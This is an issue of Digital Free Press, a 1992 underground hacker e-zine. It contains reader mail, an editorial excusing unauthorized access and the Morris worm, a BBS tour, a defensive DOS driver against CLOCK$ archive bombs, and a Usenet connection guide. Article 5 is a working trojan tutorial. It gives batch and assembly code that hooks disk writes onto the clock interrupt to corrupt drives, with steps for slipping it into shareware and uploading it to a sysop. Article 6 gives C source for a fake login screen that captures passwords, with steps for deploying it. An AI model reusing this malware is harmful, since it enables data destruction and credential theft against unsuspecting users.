1282 lines
52 KiB
Plaintext
1282 lines
52 KiB
Plaintext
|
||
######### ############ #########
|
||
########### ############ ###########
|
||
#### #### #### #### ####
|
||
#### #### #### #### ####
|
||
#### #### ######## ###########
|
||
#### #### ######## #########
|
||
#### #### #### ####
|
||
#### #### #### ####
|
||
########### #### ####
|
||
######### #### ####
|
||
|
||
DIGITAL FREE PRESS
|
||
-------------------------------------------------------------------------------
|
||
Volume 1.0 Issue 2.0
|
||
-------------------------------------------------------------------------------
|
||
|
||
* A Publication of The Underground Computing Foundation (UCF) *
|
||
|
||
* Send Submissions to: hackers%underg@uunet.uu.net *
|
||
|
||
* Editor: Max Cray (max%underg@uunet.uu.net) *
|
||
|
||
* BBS: The Underground (401) 847-2603 (v.32) *
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
Statement of Purpose and Disclaimer
|
||
|
||
The Digital Free Press is an uncensored forum to document current
|
||
activities in and of the world of modern technology. It is published under the
|
||
premise that it is better to know, rather than not know, so no attempt is made
|
||
to hide any information no matter how dangerous it may be. Information is a
|
||
double edged sword. It is neither good nor bad, and can be used for either
|
||
good or bad. Warning: Some information in this document could be used for
|
||
illegal activities. Use at your own risk. Articles are the opinion of the
|
||
authors listed, and not of the editor (unless of course the editor wrote
|
||
it).
|
||
|
||
------------------------------------------------------------------------------
|
||
In this Issue:
|
||
|
||
1. Mail to Max
|
||
2. Editorial: Old 'Hackers' vs. New 'Hackers' - Max Cray
|
||
3. A Tour of The Underground Computing Foundation BBS - Max Cray
|
||
4. Protection of DOS Devices - GodNet Raider
|
||
5. Overwriting Trojan - The BBC
|
||
6. Breaches of Security - The Joker
|
||
7. Getting on Usenet - Max Cray
|
||
8. The BBC's Crash House (Fun with ANSI.SYS) - The BBC
|
||
|
||
------------------------------------------------------------------------------
|
||
Mail to Max:
|
||
------------------------------------------------------------------------------
|
||
Date: Tue, 31 Dec 91 23:49:32 -0500
|
||
From: <Irate Upstream Sysadmin>
|
||
X-Mailer: Mail User's Shell (7.2.2 4/12/91)
|
||
To: underg!ccn
|
||
Subject: digital free press
|
||
|
||
While investigating a problem with the mail and uucp queues on my system I
|
||
discovered a message from you entitled "DIGITAL FREE PRESS Volume 1 Issue 1".
|
||
The majority of this message gave details for activities that I consider to
|
||
be either illegal or primarily malicious in nature. As such, I refuse to
|
||
have my computer system be involved in any way in the distribution of this
|
||
material. I realize that some people, perhaps including yourself, might
|
||
construe this action as restricting the freedom of the press but rest
|
||
assured that this is not the case. I am in no way usurping your rights to
|
||
say anything that you want to say, I am only refusing to help pay for it.
|
||
|
||
I will phone your system one last time to deliver this letter and then I
|
||
will sever the uucp link. If you wish to discuss this matter with me you
|
||
may call me either at work during the day or at home in the evening.
|
||
If I do not hear from you within two weeks I will return the unused portion
|
||
of your $50.
|
||
|
||
--
|
||
<Irate Upstream Sysadmin>
|
||
%% Can I be excused, my brain is full. **
|
||
--
|
||
[Editor's note: Lesson here is be sure you know your upstream sysadmin's
|
||
policy on distribution of controversial material. I was able to get the uucp
|
||
connection back, but only after agreeing not to distribute DFP anymore
|
||
through his site.]
|
||
----------------------------------------------------------------------------
|
||
Date: Thu, 2 Jan 92 20:39:09 CST
|
||
From: <Irate Pseudo Hacker>
|
||
To: max@underg
|
||
Subject: Re: DIGITAL FREE PRESS Volume 1 Issue 1
|
||
Newsgroups: alt.hackers
|
||
Organization: :noitazinagrO
|
||
|
||
You obviously have no idea about what alt.hackers is about, to refresh your
|
||
memory, enclosed is a copy of an article you should have read earlier, but
|
||
knowing your type, probably didn't. please note that it EXPLICITLY states
|
||
that this is not a forum for elitoid DOS pirate dumbshit WEENIES who like to
|
||
call themselves "hackers". go back to WWIVnet or Celeritynet or whatever
|
||
pirate-net it is that people like you use nowadays, asshole.
|
||
|
||
[alt.hackers FAQ deleted]
|
||
|
||
P.S. Please do not post this type of material here again.
|
||
--
|
||
<Irate Pseudo Hacker>
|
||
--
|
||
[Editor's note: How can this person hope to influence people by being so
|
||
confrontational? In fact the response I got from the first issue of DFP was
|
||
about 90% positive, and there were many requests to be put on the mailing
|
||
list. Thanks for your support, and please keep the mail coming!]
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------
|
||
| Article 2 of 8 | EDITORIAL
|
||
------------------
|
||
Real Hackers?
|
||
|
||
There is a lot of talk these days about how the word 'hacker' has been
|
||
redefined by the press. The theory is that the old hackers, as portrayed in
|
||
Steven Levy's excellent book _Hackers: Heroes of the Computer Revolution_,
|
||
were good and pure and this breed of hacker dramatized in the press is some
|
||
new evil non-hacker terrorist. This is nonsense.
|
||
|
||
According to the book, the hacker ethic(paraphrased) is as follows:
|
||
|
||
1. Access to computers should be unlimited and total.
|
||
|
||
2. All information should be free.
|
||
|
||
3. Mistrust Authority - Promote Decentralization.
|
||
|
||
4. Hackers should be judged by their hacking.
|
||
|
||
5. You can create art and beauty on a computer.
|
||
|
||
6. Computers can change your life for the better.
|
||
|
||
In pursuit of the hacker ethic these heroes performed various acts that
|
||
would not be looked upon favorably in today's anti-hacker society:
|
||
|
||
Used Equipment Without Authorization (Page 20)
|
||
----------------------------------------------
|
||
|
||
" So, without any authorization whatsoever, that is what Peter Sampson
|
||
set out to do, along with a few friends of his from an MIT organization
|
||
with a special interest in model railroading. It was a casual, unthinking
|
||
step into a science-fiction future, but that was typical of the way that
|
||
an odd subculture was pulling itself up by its bootstraps and growing to
|
||
underground prominence-to become a culture that would be the impolite,
|
||
unsanctioned soul of computerdom. It was among the first computer
|
||
hacker escapades of the Tech Model Railroad Club, or TMRC."
|
||
|
||
Phone Phreaked (Page 92)
|
||
------------------------
|
||
|
||
"He had programed some appropriate tones to come out of the speaker and
|
||
into the open receiver of the campus phone that sat in the Kluge room.
|
||
These tones made the phone system come to attention, so to speak, and
|
||
dance."
|
||
|
||
Modified Equipment Without Authorization (Page 96)
|
||
--------------------------------------------------
|
||
|
||
" Nelson thought that adding an 'add to memory' instruction would
|
||
improve the machine. It would take _months_, perhaps, to go through
|
||
channels to do it, and if he did it himself he would learn something
|
||
about the way the world worked. So one night Stewart Nelson spontaneously
|
||
convened the Midnight Computer Wiring Society."
|
||
|
||
Circumvented Password Systems (Page 417)
|
||
----------------------------------------
|
||
|
||
"Stallman broke the computer's encryption code and was able to get
|
||
to the protected file which held people's passwords. He started
|
||
sending people messages which would appear on screen when they
|
||
logged onto the system:
|
||
|
||
'I see you chose the password [such and such]. I suggest that
|
||
you switch to the password "carriage return." It's much
|
||
easier to type, and also it stands up to the principle that
|
||
there should be no passwords.'
|
||
|
||
'Eventually I got to the point where a fifth of all the users on
|
||
the machine had the Empty String password.' RMS later boasted.
|
||
Then the computer science laboratory installed a more sophisticated
|
||
password system on its other computer. This one was not so easy for
|
||
Stallman to crack. But Stallman was able to study the encryption
|
||
program, and as he later said, 'I discovered changing one word in
|
||
that program would cause it to print out your password on the system
|
||
console as part of the message that you were logging in.' Since
|
||
the 'system console' was visible to anyone walking by, and its
|
||
messages could easily be accessed by any terminal, or even printed
|
||
out in hard copy, Stallman's change allowed any password to be
|
||
routinely disseminated by anyone who cared to know it. He thought
|
||
the result 'amusing.'
|
||
|
||
Certainly these hackers were not anarchists who wanted only to destroy.
|
||
They had a personal code of ethics, the hacker ethic to base their behavior
|
||
on. In fact the modern hacker has his/her ethics intact. Compare the above
|
||
hacker ethic with the hacker ethic found in _Out of the Inner Circle_ by
|
||
Bill 'The Cracker' Landreth, a teenager arrested by the FBI (Page 18,60):
|
||
|
||
1. Never delete any information you can not easily restore.
|
||
|
||
2. Never leave any names on a computer.
|
||
|
||
3. Always try to obtain your own information.
|
||
|
||
The common denominator to these ethics systems are the respect for
|
||
technology, and the personal growth through free access and freedom of
|
||
information. Certainly the attitude towards private property is the same.
|
||
Accessing and using equipment that you do not own is okay as long as
|
||
you do not prevent those who own it from using it, or damage anything.
|
||
|
||
With respect to the hacker ethic the hackers mentioned in _Cyberpunk:
|
||
Outlaws and Hackers on the Computer Frontier_ by Katie Hafner and John
|
||
Markoff were in fact good hackers. If free access, and free information
|
||
were the law of the land would Kevin Mitnick have gone to jail? I do not
|
||
think so. Sure he got the source code for VMS, but is there any evidence
|
||
that he used this information for personal gain, or did he simply use the
|
||
information to improve his understanding of the VMS operating system?
|
||
|
||
Robert T. Morris's worm program was a clever hack. Of course he 'gronked'
|
||
it by programming the replication rate much too fast, but still there is no
|
||
evidence that he had any intention of doing harm to the system. It was simply
|
||
a computer experiment. Who owns the Internet? Is it some mysterious 'them'
|
||
or is it our net? If it is out net, then we should be able to try some stuff
|
||
on it, and to heck with 'them' if they can't take a joke.
|
||
|
||
Of course the German hackers are a different story. What they got in
|
||
trouble for was espionage, and not hacking, which is a breach of faith,
|
||
and is hacking for personal gain. However selling Minix to the KGB almost
|
||
makes it forgivable...
|
||
|
||
It is my contention that hackers did not change. Society changed, and it
|
||
changed for the worse. The environment the early hackers were working in
|
||
correctly viewed these activities as the desire to utilize technology in a
|
||
personal way. By definition hackers believe in the free access to computers
|
||
and to the freedom of information. If you do not believe in these principles
|
||
you are not a hacker, no matter how technologically capable you are. You
|
||
are probable just a tool for the greed society. Current bad mouthing of
|
||
hackers is simply snobbery. Rather than cracking down on the modern hacker, we
|
||
should reinforce the hacker ethic, a code of conduct not based upon greed and
|
||
lust for the almighty dollar, but instead for personal growth through the free
|
||
access of computers and information, and a respect for technology.
|
||
|
||
It is the humane thing to do.
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------
|
||
| Article 3 of 8 |
|
||
------------------
|
||
|
||
A Tour of the Underground Computing Foundation BBS
|
||
by Max Cray
|
||
|
||
I have noticed a lot of people call The UCF BBS and are unable to find
|
||
the good stuff, so let me take the opportunity to point out a few of the
|
||
high spots. First of all it is connected to the Usenet. Your international
|
||
e-mail address would be <username>%underg@uunet.uu.net. With this address
|
||
you can subscribe to all the good stuff like Phrack and NIA. There is also
|
||
a mailing list: hackers%underg@uunet.uu.net. E-mail me if you want to be
|
||
included on the list.
|
||
You can participate in the Usenet newsgroups, of which alt-cud-digest
|
||
is a must. alt.dcom.telecom is an outstanding resource for those interested
|
||
in the telephone network. There is vast amounts of very technical information
|
||
that passes through on a daily basis. Far too much to read it all. Type
|
||
USENET at the prompt to see all the newsgroups. Type in the name of the group
|
||
you want, and then type the READ command. Type the number of the first
|
||
message you want to read. If you call often you will want to configure your
|
||
NEW message scan using the JOIN command. Type ? at the prompt to get help.
|
||
There is a more local network set up, which has a newsgroup called ri.cug.
|
||
This is the Rhode Island Computer Underground, and it contains info on the
|
||
local scene around here.
|
||
If you are interested in journals type INFO. I try to keep the latest
|
||
issues of NIA, PHRACK, CUD, EFFector, and other journals here. If you are
|
||
interested in back issues go into the files section and LOG into the directory
|
||
/public/text. You can view or download text philes here. There is also some
|
||
stuff of interest in the /public/hacks directory. The /public/comm directory
|
||
contains subdirectories for the WAFFLE philes, and UUPC philes that you may
|
||
need to connect to the UUCP network.
|
||
Sorry there are no codez as it is an information board and not a pirate
|
||
board.
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------
|
||
| Article 4 of 8 |
|
||
------------------
|
||
-=[ Protection of DOS devices ]=-
|
||
|
||
-or-
|
||
|
||
/*******************************************/
|
||
/* Unarc, Unzip, Lha extract, and be merry */
|
||
/* for tomorrow we may lock. */
|
||
/*******************************************/
|
||
|
||
- written by -
|
||
GodNet Raider
|
||
- of -
|
||
The CyberUnderground
|
||
|
||
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
|
||
|
||
]----------------------------------------------------------------------------[
|
||
|
||
Introduction:
|
||
-------------
|
||
|
||
This phile is written in response to the practice of misusing using
|
||
MS-DOS devices (ie.. to make archive bombs). The following will explain the
|
||
problem and some of the possible solutions. Also included is an ASM source
|
||
that will remap the 'CLOCK$' device to a 'NUL' (basic bit bucket) type
|
||
device.
|
||
|
||
The problem:
|
||
------------
|
||
|
||
In a never ending attempt of OS designers to mask the inner workings
|
||
of system hardware, the idea of device drivers comes into play. A device
|
||
driver is basically an attempt to standardize I/O with the systems' hardware.
|
||
Thus allowing access to every thing from keyboards to CD ROMS without an
|
||
in depth knowledge of the physical hardware involved.
|
||
|
||
This ideal is valid and of great help in program development, yet when
|
||
the drivers are not well defined there is the tendency for them to cause
|
||
more harm then good. A case in point is the 'CLOCK$' device in MS-DOS.
|
||
|
||
'CLOCK$' is a driver designed to allow updating of the CMOS clock.
|
||
It passes data direct to the CMOS clock with out buffering or any attempt
|
||
at error checking. Thereby passing valid data as well as invalid. An with
|
||
no internal mechanism to detect an overflow condition/not sending EOF after
|
||
a read will tend to hang systems/knock out the date and time stored in the
|
||
CMOS clock. This problem has come of use to the hacker community.
|
||
|
||
Several methods of the assault have been:
|
||
|
||
1) Uploading 'CLOCK$.*' files to remote systems.
|
||
|
||
2) Using BBS archiveing utilities to create 'CLOCK$.*'
|
||
files for download.
|
||
|
||
3) Low level disk editing of archive files to rename files
|
||
in it to 'CLOCK$.*'
|
||
|
||
Some possible solutions:
|
||
------------------------
|
||
|
||
Of the solutions available none are complete. There are benefits and
|
||
disadvantages to each. Nor is the following a complete list, it is only
|
||
an attempt to discus some of the common ones.
|
||
|
||
Abstinence:
|
||
Not excepting/expanding archive files on ones system. This is
|
||
the most undesirable but most effective and is only listed
|
||
'for abstinence makes the heart grow fonder'.
|
||
|
||
Scanning archives:
|
||
Most archive programs come with a utility to view the files
|
||
stored in a given archive (lha v foobar.lzh). The only real
|
||
drawback is having to take the time to scan archives. This
|
||
does not protect from BBS's that create real time archives,
|
||
extract to check for virus batches (with out looking thought
|
||
the archive first), uploads of 'CLOCK$.*' files, and programs
|
||
that create and write to a 'CLOCK$.*' file.
|
||
|
||
Updating programs:
|
||
Getting new versions of programs that watch for 'CLOCK$.*' and
|
||
avoid creating/writing to said file is a problem in that you
|
||
must wait for the author to come up with the fix and have to
|
||
pay for the update. Another reason for software makers to
|
||
release code with their programs.
|
||
|
||
TSR protection programs:
|
||
Other than yet another drain on precious RAM and clock time.
|
||
Can only protect from programs that create files though
|
||
interrupts. Pipes and redirects may slip though the cracks.
|
||
|
||
LOW LEVEL disk editing of io.sys files:
|
||
Renaming the 'CLOCK$' device is a method that will protect on
|
||
all levels but may cause some programs to hang that use it.
|
||
Also to replace it is not easy for you must reedit the file
|
||
(without moving it). It should also be noted that the new name
|
||
MUST be the same size as the original (6 letters).
|
||
|
||
Creation of a new 'CLOCK$' device:
|
||
This offers the protection of the above method with out the
|
||
need of changing OS binary files and to allow/disallow the
|
||
ORIGINAL 'CLOCK$' device by editing the config.sys file
|
||
instead. One disadvantage is that update of the CMOS clock
|
||
though 'CLOCK$' is stoped. Yet the BIOS clock is still
|
||
accessible and the CMOS clock can be updated though the BIOS
|
||
setup routine or programs that write direct to CMOS. Source
|
||
for a simple null mask clock device driver is provided below
|
||
and can be use as a template to create your own 'CLOCK$'
|
||
replacement.
|
||
|
||
There are other solutions to this problem not listed here.
|
||
|
||
Clock$ null device Source Code:
|
||
-------------------------------
|
||
|
||
The following ASM code is for a DOS device driver that will replace
|
||
the existing 'CLOCK$' device when added to the config.sys file
|
||
(device=outclock.sys).
|
||
|
||
The key points of the device are:
|
||
|
||
1) The line - DW 8080h. This tells the device loader that
|
||
outclock wishes to replace the present clock device
|
||
with it's self. This will trap all internal calls and
|
||
to redirect any calls to the new driver.
|
||
|
||
2) The line - DB 'CLOCK$ '. This will setup the device
|
||
to trap external access though pipes, indirects, file
|
||
I/O, and IOCTL's.
|
||
|
||
3) The device strategy is to simply ignore all incoming
|
||
commands to the device (standard practice for the
|
||
'NUL' device).
|
||
|
||
This driver does not prevent access to the CMOS clock except though
|
||
the CLOCK$ device. So it will not effect the running of programs EXCEPT
|
||
those that try to update the CMOS clock though the this device.
|
||
|
||
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
|
||
|
||
CSEG segment public 'CODE'
|
||
org 0
|
||
assume CS:CSEG, DS:CSEG, ES:CSEG
|
||
DEVICE proc far
|
||
DD 0ffffffffh ;------------------------------;
|
||
DW 8080h ; The following 5 definitions ;
|
||
DW DEV_STRATEGY ; 18 (bytes) MUST be at offset ;
|
||
DW DEV_INTERRUPT ; 0 in the binary file. ;
|
||
DB 'CLOCK$ ' ;------------------------------;
|
||
KEEP_ES DW ?
|
||
KEEP_BX DW ?
|
||
FUNCTIONS label word
|
||
DW INIT
|
||
DW CHK_MEDIA
|
||
DW MAKE_BPB
|
||
DW IOCTL_IN
|
||
DW INPUT_DATA
|
||
DW NONDSTRCT_IN
|
||
DW INPUT_STATUS
|
||
DW CLEAR_INPUT
|
||
DW OUTPUT_DATA
|
||
DW OUTPUT_VERIFY
|
||
DW OUTPUT_STATUS
|
||
DW CLEAR_OUTPUT
|
||
DW IOCTL_OUT
|
||
|
||
DEV_STRATEGY:
|
||
mov CS:KEEP_ES, ES
|
||
mov CS:KEEP_BX, BX
|
||
ret
|
||
|
||
DEV_INTERRUPT:
|
||
push ES
|
||
push DS
|
||
push AX
|
||
push BX
|
||
push CX
|
||
push DX
|
||
push SI
|
||
push DI
|
||
push BP
|
||
mov AX, CS:KEEP_ES
|
||
mov ES, AX
|
||
mov BX, CS:KEEP_BX
|
||
mov ES:word ptr [BX] + 3, 0000h
|
||
mov AL, ES:[BX] + 2
|
||
shl AL, 1
|
||
xor AH, AH
|
||
lea DI, FUNCTIONS
|
||
add DI, AX
|
||
jmp word ptr [DI]
|
||
|
||
INIT:
|
||
lea AX, E_O_P
|
||
mov ES:word ptr [BX] + 14, AX
|
||
mov ES:word ptr [BX] + 16, CS
|
||
jmp short QUIT
|
||
|
||
INPUT_STATUS:
|
||
KEY_READY:
|
||
NONDSTRCT_IN:
|
||
INPUT_DATA:
|
||
OUTPUT_DATA:
|
||
OUTPUT_VERIFY:
|
||
CHK_MEDIA:
|
||
MAKE_BPB:
|
||
IOCTL_IN:
|
||
IOCTL_OUT:
|
||
OUTPUT_STATUS:
|
||
CLEAR_OUTPUT:
|
||
CLEAR_INPUT:
|
||
QUIT:
|
||
or ES:word ptr [BX] + 3, 0100h
|
||
pop BP
|
||
pop DI
|
||
pop SI
|
||
pop DX
|
||
pop CX
|
||
pop BX
|
||
pop AX
|
||
pop DS
|
||
pop ES
|
||
ret
|
||
E_O_P:
|
||
DEVICE endp
|
||
CSEG ends
|
||
end DEVICE
|
||
|
||
+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
|
||
|
||
]============================================================================[
|
||
|
||
underg!tsf!gnr@uunet.uu.net (GodNet Raider)
|
||
-=[ "You gotta learn to listen, before you learn to play." ]=-
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------
|
||
| Article 5 of 8 |
|
||
------------------
|
||
|
||
To: hackers@underg.UUCP
|
||
Subject: Text phile 2
|
||
From: bbc@tsf.UUCP (The BBC)
|
||
Organization: The CyberUnderground
|
||
|
||
Welcome class... An now... for another lesson in the misuse of
|
||
computers...
|
||
|
||
So you thought that INJECT.BAT was fun... But you did not like
|
||
the idea of making the injection give the fun away by causing the
|
||
host program to crash after the trojan ran... Well then lets get a
|
||
little more sophisticated then... Now rather than overwriting the
|
||
existing host code lets just... Oooooh... Say... Add a new function
|
||
to an existing program... Now what to add... Something
|
||
destructive???? Why not...
|
||
|
||
Ok How about a bit o' code that just moves the absolute disk
|
||
write interrupt to the clock interrupt... Then each time the clock
|
||
ticks (about 18 times a second) the computer attempts a disk write
|
||
with random data... Good way to test THOSE ol' ALT-CTRL-DEL
|
||
reflexes... Oooooh... What fun, it is to crash, in a one drive
|
||
nonbacked-up system...
|
||
|
||
Well now for the fun part...
|
||
|
||
Step 1:
|
||
|
||
Make a batch file called "ADDON.BAT" an in it place
|
||
the following commands -
|
||
|
||
=============================================================
|
||
echo off
|
||
cls
|
||
rename %2 ~~temp2.~tp > nul
|
||
copy %1+~~temp2.~tp %2 /b > nul
|
||
erase ~~temp2.~tp > nul
|
||
=============================================================
|
||
|
||
Step 2:
|
||
|
||
Make a ASM file called "TROJAN.ASM" an in it place the
|
||
following -
|
||
|
||
=============================================================
|
||
PROGSEG segment para public 'CODE'
|
||
assume CS:PROGSEG
|
||
DOIT proc
|
||
wSaveDS dw 9090h ; Store old DS register here...
|
||
mov AX, DS
|
||
mov CS:wSaveDS, AX ; Save DS address for hosts'
|
||
; use...
|
||
|
||
;-------------- v Place Trojan Here v -------------;
|
||
|
||
mov AX, 3526h ; Get DOS absolute write interrupt...
|
||
int 21h
|
||
mov DX, BX ; Set clock interrupt to returned
|
||
; value...
|
||
mov AX, ES
|
||
mov DS, AX
|
||
mov AX, 2508h
|
||
int 21h
|
||
xor BX, BX ; Rezap used registers [other than
|
||
; AX/DS/ES]...
|
||
xor CX, CX
|
||
xor DX, DX
|
||
|
||
;--------------- ^ Place Trojan Here ^ ------------;
|
||
|
||
mov AX, CS:wSaveDS ; Restore DS, ES registers for
|
||
; host...
|
||
mov DS, AX
|
||
mov ES, AX
|
||
xor AX, AX
|
||
DOIT endp ; Host will start after this
|
||
; point...
|
||
PROGSEG ends
|
||
end
|
||
=============================================================
|
||
|
||
Step 3:
|
||
|
||
Then assemble and link the trojan file. Use exe2bin [or
|
||
whatever utility you have to convert .EXEs to .COM format]
|
||
to make a .COM file out of TROJAN.EXE.....
|
||
|
||
Step 4:
|
||
|
||
Then copy a *.COM file into the same directory. Should
|
||
be part of some shareware thing that the target sysop would
|
||
like. With docs an all... would not want them to get
|
||
suspicious, now would we.............
|
||
|
||
Step 5:
|
||
|
||
Run the following command from the dos prompt...
|
||
|
||
ADDON <Trojan file> <COM file to add trojan to>
|
||
|
||
Step 6:
|
||
|
||
Upload the mess to the unsuspecting sysop and watch the fun!
|
||
|
||
|
||
See and you thought hacking was hard...... Of course if they
|
||
get smug and start searching for the added code.... We'll just have
|
||
to add extra code (nops' ect) and/or switching some of the code
|
||
around in the ASM file...
|
||
|
||
'Another fine mess' from...
|
||
The BBC
|
||
|
||
---------------------------------------------------------------------
|
||
...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
|
||
-=[ "Anarchy is never HAVING to say you're sorry." ]=-
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------
|
||
| Article 6 of 8 |
|
||
------------------
|
||
|
||
Breaches of Security
|
||
by
|
||
The Joker
|
||
----------------------
|
||
|
||
Hello loves, Here we are with yet another page from the _Tomb of
|
||
Ultimate Evil_ (THOSE of good aliment must make a saving throw against
|
||
neophytedom).
|
||
|
||
Todays chat is on the subject of collecting passwords, not that anyone
|
||
here would have nothing but nobel reasons to do such a thing. An in
|
||
this wonderfully wacky world of networks, UNIX, and VMS it's just the in
|
||
t'ing to do. So now boys and girls, hacks and hacketts, Rocky and
|
||
bullwinkel let us begin.
|
||
|
||
Ah, what a tangled web we weave when first we practice to deceive...
|
||
Yet how easy it makes it to get what we want. An deception is the key
|
||
here. For thanks to the simple format of most logins (name, password...
|
||
rank, serial number, underwear condition...). The simplicity of the answer
|
||
makes it a wonderful little exercise in shell programming.
|
||
|
||
What is needed is a simple program that pretends it's a login shell
|
||
and is set like a little program beartrap. Sitting quietly, waiting
|
||
for that most elusive of pray... The north american password! (An them's
|
||
good eating too). So as we send our assistant into the system to wrestle
|
||
and subdue the foul beasty, let us listen to a message from the good folks
|
||
at Mutual of Omaha... Ooop sorry, instead let us look at a model of a simple
|
||
password capture shell. What? You want the insurance commercial instead...
|
||
Well, tough cookies.
|
||
|
||
|------------------------------[ Cut Line ]----------------------------------|
|
||
|
||
/*
|
||
LogTrap.c
|
||
(c) 1992 by Joculator inc., no rights reserved (or respected).
|
||
Rubber cell #182
|
||
Arkham Asylum
|
||
Gotham City
|
||
|
||
Captures first login attempt by a user, to file (*szKeepFile),
|
||
then give phony error (*szPhonyError) and call real login shell
|
||
(*aszRealShell []). For the express purpose of promoting glorious
|
||
world chaos.
|
||
*/
|
||
|
||
#include <stdio.h>
|
||
#include <stdlib.h>
|
||
#include <process.h>
|
||
|
||
#define TRUE 1
|
||
#define MAX_BUFFER 256
|
||
#define ECHO 0
|
||
#define NOECHO 1
|
||
#define NEWLINE "\n"
|
||
#define ANSI_CLS "\x1b[2J"
|
||
#define ANSI_NOECHO "\x1b[8m \x1b[40D"
|
||
#define ANSI_ECHO "\x1b[0m"
|
||
|
||
struct
|
||
{
|
||
char
|
||
*szPrompt,
|
||
fNoEcho;
|
||
} *ptPrompts,
|
||
Prompts [] = /* Prompts patterned after real login shell. */
|
||
{
|
||
/* [Prompt string], [ECHO | NOECHO] */
|
||
"Login: " , ECHO,
|
||
"Password: " , NOECHO,
|
||
NULL
|
||
};
|
||
|
||
char
|
||
*szPhonyError = "Invalid login.\n", /* Error patterned after LOGIN. */
|
||
*aszRealShell [] = /* Command to call real LOGIN. */
|
||
{
|
||
"LOGIN",
|
||
/* list parameters (if any) here */
|
||
NULL
|
||
},
|
||
*szKeepFile = "~tmp0167.tmp", /* Save booty in... */
|
||
szWorkBuffer [MAX_BUFFER];
|
||
|
||
void
|
||
main (void);
|
||
|
||
void main (void)
|
||
{
|
||
FILE
|
||
*OutStream;
|
||
|
||
/* Cover our tracks. */
|
||
printf (ANSI_CLS);
|
||
/* Prompt for and save user information. */
|
||
for (ptPrompts = Prompts; ptPrompts->szPrompt; ptPrompts++)
|
||
{
|
||
printf (ptPrompts->szPrompt);
|
||
if (ptPrompts->fNoEcho)
|
||
printf (ANSI_NOECHO);
|
||
fgets (szWorkBuffer, MAX_BUFFER, stdin);
|
||
if (ptPrompts->fNoEcho)
|
||
printf (ANSI_ECHO);
|
||
/* If file error, ignore it but, don't try to write to file. */
|
||
if (OutStream = fopen (szKeepFile, "a"))
|
||
{
|
||
fputs (ptPrompts->szPrompt, OutStream);
|
||
fputs (szWorkBuffer, OutStream);
|
||
}
|
||
fclose (OutStream);
|
||
}
|
||
/* Stick tongue out, Naaaa... */
|
||
printf (szPhonyError);
|
||
/* Commit process suicide by running LOGIN shell on top of our process. */
|
||
/* It should not return (unlike a bad check). */
|
||
execvp (aszRealShell [0], &aszRealShell [1]);
|
||
/* if execvp () (it got to this point?), lock system. */
|
||
while (TRUE);
|
||
}
|
||
|
||
|------------------------------[ Cut Line ]----------------------------------|
|
||
|
||
So there you have it. Now all that is left to do is:
|
||
|
||
1: Set Prompts [], *szPhonyError, and *aszRealShell [] to match the
|
||
LOGIN of the target system.
|
||
|
||
2: Set *szKeepFile to where you want your ill gotten booty to go.
|
||
|
||
3: Compile the whole mess.
|
||
|
||
4: LOGIN to the target system and run the program. For more fun
|
||
place copies on more than one terminal, if possible, on the same
|
||
system.
|
||
|
||
5: Run to your duck blind and wait for a user to spring your lil'
|
||
trap.
|
||
|
||
That's it, have fun, And remember...
|
||
If someone offers you drugs, just say... Yo!
|
||
|
||
----------------------------------------------------------------------
|
||
|
||
...uunet!rayssd!galaxia!underg!tsf!joker (The Joker)
|
||
-=[ "All it takes is one bad day, then maddness has its way." ]=-
|
||
|
||
------------------------------------------------------------------------------
|
||
------------------
|
||
| Article 7 of 8 |
|
||
------------------
|
||
|
||
Getting on Usenet
|
||
by Max Cray
|
||
|
||
Much of the information from this phile comes from the excellent text
|
||
phile INTRO.DOC that comes with the Waffle BBS package. Other information
|
||
was gained from various books, and postings on the net itself, especially
|
||
the FAQs (Frequently Asked Questions) postings in news.answers, and also my
|
||
personal experience.
|
||
|
||
Before you actually connect your machine to Usenet, it may be easier
|
||
for you to learn about Usenet, and what it can do for you, by calling a
|
||
BBS that is connected to Usenet. Good choices would be my own Underground,
|
||
or any of the systems listed in the *nixpub. This is a document regularly
|
||
posted to the Usenet listing all known unix bbs systems. You can get a copy
|
||
of this from my bbs or from the following sources:
|
||
|
||
o anonymous uucp from jabber.
|
||
+1 215 348 9727 [Telebit access]
|
||
LOGIN: nuucp NO PWD [no rmail permitted]
|
||
this list: /usr/spool/uucppublic/nixpub.short
|
||
long list: /usr/spool/uucppublic/nixpub
|
||
o "*NIX Depot" BBS on jabber.
|
||
o USENET, regular posts to:
|
||
comp.misc
|
||
alt.bbs
|
||
o the nixpub electronic mailing list.
|
||
to be included or deleted from this distribution,
|
||
send mail to nixpub-list-request@ls.com.
|
||
o anonymous ftp from GVL.Unisys.COM [128.126.220.102]
|
||
under ~/pub/nixpub/{long,short}
|
||
o archive server from cs.widener.edu.
|
||
mail to archive-server@cs.widener.edu
|
||
Subject: or body of
|
||
send nixpub long
|
||
or
|
||
send nixpub short
|
||
or
|
||
send nixpub long short
|
||
or even
|
||
index nixpub
|
||
|
||
I will talk more about anonymous uucp, mailing lists, and archive servers
|
||
in a minute.
|
||
|
||
UUCP SOFTWARE
|
||
|
||
The first thing you need to connect your machine to the Usenet is
|
||
software, and the first choice would be a version of the unix operating system
|
||
itself. In fact to get a copy of the real thing is not that expensive anymore.
|
||
As of this writing Consensys Corporation (1301 Pat Booker Rd., Universal City,
|
||
TX, 78148, 1-800-387-8951) has UNIX System V Release 4 (the latest) including
|
||
C development, Networking, and X Windows, for 386+ systems for $495. Certainly
|
||
a big chunk of change, but a great deal for what you get. If cost is important
|
||
you might try Coherent by Mark Williams Company (60 Revere Dr., Northbrook,
|
||
IL. 60062, 1-800-627-5967). This is a less robust unix clone os that should
|
||
run on any pc compatible computer. The price is right at $100. If you just
|
||
want uucp connectivity, but you don't want to switch to a real operating
|
||
system, then you might want to check out the Waffle BBS package. It can be
|
||
found at SIMTEL, UUNET, or also can be gotten from the source: darkside.com
|
||
BBS at 1-408-245-SPAM (e-mail: dell@vox.darkside.com), or from The Underground
|
||
BBS. The package does not need to be run as a bbs, but can also be run as a
|
||
personal system, and it is shareware. If you want freeware, then you might be
|
||
interested in UUPC which can also be gotten from SIMTEL, UUNET, or from my
|
||
bbs. Source code is available.
|
||
|
||
